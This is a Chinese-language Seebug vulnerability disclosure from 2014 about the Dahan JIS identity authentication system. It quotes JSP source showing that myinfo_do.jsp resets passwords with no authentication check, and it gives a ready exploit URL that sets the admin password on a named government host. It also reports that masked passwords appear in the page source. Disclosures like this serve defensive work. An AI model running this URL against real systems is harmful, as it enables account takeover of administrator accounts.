大汉版通JIS统一身份认证系统某处可任意修改用户密码

2014-02-06T00:00:00
ID SSV:93876
Type seebug
Reporter Root
Modified 2014-02-06T00:00:00

Description

简要描述:

不敢乱改。直接就可以改任何用户的密码,不用知道原密码,和之前有的大牛提交的漏洞是不一样的类型。

详细说明:

就修改了一个2.2.1版本的来测试。因为这个已经知道了后台密码,已经修改回去了。 另外,星号密码可在源码查看的问题,也顺便一起丢上来好了

漏洞证明:

http://management.ysx.gov.cn/jis/check/jportal/myinfo_do.jsp

//定义用户对象 Merp_Pub_UserEntity userEntity = new Merp_Pub_UserEntity(); //定义操作类 UserBLF userBlf = new UserBLF(request); //获取登录名 String loginid=Convert.getParameter(request, "loginid", "", true, true); String siteurl = Convert.getParameter(request, "siteurl", "", true, true); String year = Convert.getParameter(request, "year", "", true, true); String month = Convert.getParameter(request, "month", "", true,true); String day = Convert.getParameter(request, "day", "", true, true); String vc_sex = Convert.getParameter(request, "vc_sex", "", true, true); String vc_email=Convert.getParameter(request, "vc_email", "", true, true); String sex=""; if (vc_sex.equals("男")) { sex = "1"; } else { sex = "0"; } String vc_newpassword = Convert.getParameter(request,"new_password","",true,true);

没有用户的身份验证、各类参数都纯粹是从用户提交的数据中获取的。 利用方法: /jis/check/jportal/myinfo_do.jsp?loginid=admin&vc_email=&new_password=123456&vc_username=admin 直接可以修改admin的密码 登录一看源码就知道已经改成123456了

<img src="https://images.seebug.org/upload/201402/061138100a3db54f30ddef53448c546418bce5c6.png" alt="image082.png" width="600" onerror="javascript:errimg(this);">

上面的图片也可以看出,星号密码是可以直接查看的,在普通用户的界面也是有这个问题:

<img src="https://images.seebug.org/upload/201402/0611391440e255e54eff7bf7486a3432860a8cf1.png" alt="image084.png" width="600" onerror="javascript:errimg(this);">